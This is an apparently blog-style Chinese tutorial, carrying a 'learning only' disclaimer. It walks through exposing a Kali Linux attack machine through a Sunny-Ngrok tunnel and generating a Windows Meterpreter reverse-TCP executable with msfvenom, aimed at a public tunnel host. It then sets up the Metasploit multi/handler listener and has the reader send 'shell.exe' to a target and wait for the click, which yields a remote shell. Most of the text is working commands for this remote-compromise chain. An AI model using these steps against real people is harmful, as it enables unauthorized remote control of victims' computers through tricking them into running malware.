免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
简介:
Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。
Kali常用配置和基本使用:
- Kali工具集介绍
- 修改Kali源和更新软件
- Kali伪装成win10
- Kali启动root用户
1.外网步骤思想图
Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成Shell.exe ----->监听当前Ip是否点击---->目标电脑发送exe---->点击shell.exe
1、进入Ngrok网站注册一个用户(Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器)
2.下载Kali LInux版本 Sunny-Ngrok内网转发
1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本)
2. 拖入虚拟器托不进去看上一个教程 解压zip
3.进入解压好的目录: 报错Tcp就重新去Ngrok重新换一个隧道免费很多人用
./sunny clientid id =>隧道id
启动了当前窗口不要关闭
3、MSF生成外网MM
不加Tcp不然报错
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com:10161 lport=10306 -f exe -o /home/shell.exe
4、打开msf设置payload,加载攻击模块设置本地IP和监听端口
msfconsole 开启
5.绑定当前端口Ip
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 当前Ip Kali
set LPORT 4444
-
show options (查看IP端口设置情况)
-
run (开启监听)
6.等待对方点击shell.exeMM
成功就有meterpreter命令行 执行命令即可
总结:
就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
监听到信息连接----->成功!!!